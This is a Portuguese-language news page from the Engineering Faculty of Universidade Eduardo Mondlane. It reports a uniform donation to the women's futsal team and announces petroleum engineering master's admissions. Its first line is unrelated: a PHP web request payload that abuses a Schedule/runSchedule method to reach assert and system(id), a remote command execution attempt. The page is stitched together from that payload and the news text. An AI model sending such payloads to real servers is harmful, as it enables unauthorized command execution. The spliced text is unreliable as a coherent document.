app=Common&model=Schedule&method=runSchedule&id[status]=1&id[method]=Schedule->_validationFieldItem&id[4]=function&[6][]=&id[0]=cmd&id[1]=assert&id[args]=cmd=system(id)
 
O Centro Regional de Excelência em Estudos de Engenharia e Tecnologia de Petróleo e Gás (CSOGET) fez a entrega de uniforme futebolístico às estudantes (meninas) da Faculdade de Engenharia, membros da equipa Futsal, a 02 de Dezembro último, numa cerimónia em que estiveram presentes o Director da Faculdade, a Directora Adjunta Para a Investigação e Extensão, representantes do NEEN e as meninas.
 
O Director do CSOGET, Prof. Doutor Luís Hélder afirmou que este gesto demostrava um compromisso do CSOGET com a Iniciativa de consciencialização do Género para representatividade na carreira académica e desportiva nacional e regional. Disse ainda que estava à disposição para continuar apoiando estas actividades, dentro da cooperação existente entre esta Unidade Órgânica e a Faculdade de Engenharia.
 
O Director da Faculdade de Engenharia, Prof. Doutor Dinis Juízo, agradeceu o gesto do CSOGET e encorajou as atletas que trouxessem mais troféus para a faculdade. Mencionou ainda que a actividade física não é só benéfica para o desenvolvimento físico, mas também para o desenvolvimento psicológico, o que ajuda bastante no desempenho académico.
A Faculdade de Engenharia da Universidade Eduardo Mondlane (FE-UEM) leva ao conhecimento público que estão abertas vagas para candidaturas para a frequência da 10ª edição do curso de Mestrado em Engenharia do Petróleo. O objectivo fundamental deste curso é a formação de Engenheiros do Petróleo contribuindo para uma maior participação de moçambicanos nas actividades de exploração e produção de gás e petróleo em Moçambique.
Para mais informações Clique em Edital.
A Faculdade de Engenharia da Universidade Eduardo Mondlane pretende lançar a 11ª edição do Curso de Preparação para Candidatos ao Mestrado em Engenharia de Petróleo, com o início previsto para meados de Fevereiro de 2023 e com uma duração aproximada de 10 meses. este curso de Pós-Graduação é um pré-requisito fundamental para candidatos ao Mestrado em Engenharia do Petróleo, que não possuam uma licenciatura neste ramo específico de engenharia.
 
Para mais informações Clique em Edital.